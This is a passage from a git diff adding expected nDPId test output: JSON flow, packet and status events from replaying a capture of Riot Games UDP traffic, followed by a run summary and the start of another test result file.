{"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":879,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1654781451507} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654781451507,"flow_last_seen":1654781451507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654781451507,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1654781451507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654781451507,"pkt":"eJS0JASgYDjgxTWgCABFAABAaVkAAH8RJE3AqAJkovlIAfWGH\/UALPN\/c3T2DHIyQgSrWX+BH8wAh2u8AAAW43xAFAAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654781451507,"flow_last_seen":1654781451507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654781451507,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1654781451526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654781451526,"pkt":"YDjgxTWgeJS0JASgCABFAABAcP9AADgRI6ei+UgBwKgCZB\/19YYALF0BcjJCBAAAAACrWX+BH8wAh2u8AAAW43xAFAAAAKqqqqq7u7u7"} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1648063928092,"flow_last_seen":1648063928151,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1654781451526,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1654783623503} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654783623503,"flow_last_seen":1654783623503,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623503,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1654783623503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654783623503,"pkt":"eJS0JASgYDjgxTWgCABFAABAtqAAAH8RVRrAqAJkK+VBAdPXHz4ALLwuE5sFlpUyRyCrWX+BH8wGEZxbAABBqxZPGQAAAKqqqqq7u7u7"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654783623503,"flow_last_seen":1654783623503,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623503,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1654783623769,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654783623769,"pkt":"YDjgxTWgeJS0JASgCABFAABA3N9AADARPdsr5UEBwKgCZB8+09cALNVflTJHIAAAAACrWX+BH8wGEZxbAABBqxZPGQAAAKqqqqq7u7u7"} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654781451507,"flow_last_seen":1654781451526,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":22,"packets-processed":21,"total-skipped-flows":0,"total-l4-payload-len":1023,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1654785423332} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654785423332,"flow_last_seen":1654785423332,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1654785423332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654785423332,"pkt":"eJS0JASgYDjgxTWgCABFAABA04EAAH8RuiTAqAJkovlIAeL6H\/UALG1KXY5aogEy\/RarWX+BH8wKaJLmAAB8mNx\/HQAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654785423332,"flow_last_seen":1654785423332,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1654785423380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654785423380,"pkt":"YDjgxTWgeJS0JASgCABFAABASwdAADYRS5+i+UgBwKgCZB\/14voALCV7ATL9FgAAAACrWX+BH8wKaJLmAAB8mNx\/HQAAAKqqqqq7u7u7"} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654783623503,"flow_last_seen":1654783623769,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423380,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":1095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1654790643639} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654790643639,"flow_last_seen":1654790643639,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643639,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1654790643639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654790643639,"pkt":"eJS0JASgYDjgxTWgCABFAABAp6MAAH8R5gLAqAJkovlIAcNUH\/UALPlTK70DER4y\/RWrWX+BH8wXFh2xAABS+GKnKQAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654790643639,"flow_last_seen":1654790643639,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643639,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1654790643680,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654790643680,"pkt":"YDjgxTWgeJS0JASgCABFAABAVJVAADURQxGi+UgBwKgCZB\/1w1QALCgiHjL9FQAAAACrWX+BH8wXFh2xAABS+GKnKQAAAKqqqqq7u7u7"} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654785423332,"flow_last_seen":1654785423380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":25,"total-skipped-flows":0,"total-l4-payload-len":1167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1655323563669} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655323563669,"flow_last_seen":1655323563669,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563669,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655323563669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1655323563669,"pkt":"eJS0JASgYDjgxTWgCABFAABAIVQAAH8R6mbAqAJkK+VBAfY+Hz4ALJnHE5sFlpUyRyCrWX+BDpAHcmnvAADfWdrm+QAAAKqqqqq7u7u7"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655323563669,"flow_last_seen":1655323563669,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563669,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655323563941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1655323563941,"pkt":"YDjgxTWgeJS0JASgCABFAABAW6NAAC8RwBcr5UEBwKgCZB8+9j4ALLL4lTJHIAAAAACrWX+BDpAHcmnvAADfWdrm+QAAAKqqqqq7u7u7"} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654790643639,"flow_last_seen":1654790643680,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563941,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":1239,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655757069043} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655757069043,"flow_last_seen":1655757069043,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1655757069043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655757069043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1655757069043,"pkt":"eJS0JASgYDjgxTWgCABFAAAkrucAAH8RlrbAqAJkQhbxCO6rw1QAEGNsEzfK\/hYAAAA="} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655757069043,"flow_last_seen":1655757069043,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1655757069043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655757069107,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1655757069107,"pkt":"YDjgxTWgeJS0JASgCABFAAAkQStAADYRDXNCFvEIwKgCZMNU7qsAEGNsEzfK\/hYAAAAAAAAAAAAAAAAA"} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1655323563669,"flow_last_seen":1655323563941,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655757069107,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":1255,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1657052125163} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1657052125163,"flow_last_seen":1657052125163,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1657052125163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1657052125163,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1657052125163,"pkt":"eJS0JASgYDjgxTWgCABFAABRqHYAAH8R5R7AqAJkovlIAcCSHBoAPQSXzcb7QPwy+QMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1657052125163,"flow_last_seen":1657052125163,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1657052125163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1657052126157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1657052126157,"pkt":"eJS0JASgYDjgxTWgCABFAABRqHcAAH8R5R3AqAJkovlIAcCSHBoAPQSXzcb7QPwy+QMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1657052126464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1657052126464,"pkt":"YDjgxTWgeJS0JASgCABFAAA9paFAAPYRMQei+UgBwKgCZBwawJIAKXrw\/DL5AwEAAAC8FwL8OQwqd\/zywtfCXzxlgMLEt38OVBEK"} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1655757069043,"flow_last_seen":1655757069107,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1657052127590,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"66.22.241.8","src_port":61099,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1657052125163,"flow_last_seen":1657052127590,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1657052127590,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":49298,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-payload-len":2085,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1657052127590} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 44/44 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 2085 bytes +~~ total detected protocols..: 9 +~~ total active/idle flows...: 9/9 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6012833 bytes +~~ total memory freed........: 6012833 bytes +~~ total allocations/frees...: 120952/120952 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 452 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 570 chars diff --git a/test/results/rsh-syslog-false-positive.pcap.out b/test/results/rsh-syslog-false-positive.pcap.out index 5cc70fd92..6db589ef0 100644 --- a/test/results/rsh-syslog-false-positive.pcap.out +++ b/test/results/rsh-syslog-false-positive.pcap.out @@ -2,14 +2,14 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1464076252936} 